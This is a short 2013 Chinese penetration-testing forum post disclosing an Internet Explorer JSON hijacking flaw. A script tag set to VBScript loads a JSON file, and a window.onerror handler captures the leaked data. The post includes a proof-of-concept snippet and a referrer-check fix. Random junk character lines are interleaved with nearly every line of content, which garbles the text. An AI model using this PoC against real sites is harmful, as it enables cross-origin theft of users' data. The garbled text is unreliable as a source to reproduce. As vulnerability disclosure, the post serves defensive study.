中国网络渗透测试联盟
标题:
IE通用JSON劫持漏洞
[打印本页]
作者:
admin
时间:
2013-2-23 11:33
标题:
IE通用JSON劫持漏洞
简要描述:
4 G; k @8 d4 k8 e6 t0 t2 H2 h
6 i4 e% m m5 N1 z \
由于某些资源容器对数据处理不当导致json劫持漏洞.
/ z y( U% o: @# N8 D* s
详细说明:
8 k3 u# t/ z6 _( G8 z
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
. |9 Q( {/ e* K L6 b# n
<script language=vbscript></script>
- q V$ e+ A6 O
( S9 d4 T! I2 {2 {$ N* y. z) ~, W
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
3 B/ J/ k1 v, E5 {# l2 E
漏洞证明:
7 \7 R' w. Z8 K8 s8 `1 s& ?
<script>
- m5 ~( Y- u& m' y& Z
window.onerror=function(_){
2 Q) U, b4 b3 L6 ? v
alert(_)
+ ~" z2 I5 ~. j R" i
}
- A. b% e: h' ~/ ]
</script>
/ y1 \" {# b0 S7 ^# ]$ Q+ d
<script language=vbscript src=1.json></script>
/ \- }0 y, A6 H% ?! c
3 [, {; I# h! f- G( K! L
! K, Z7 X) g8 V1 G' z
1.json:
6 O; Z% k6 ~! b+ Q* e
[{"name":"sogili","age":19}]
I' u4 v6 J' Z$ r# c9 M
修复方案:
6 c5 _' M) x5 f; T D) [8 J- I
网站业务对于这个问题可以通过验证referrer是否为同源来防御
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2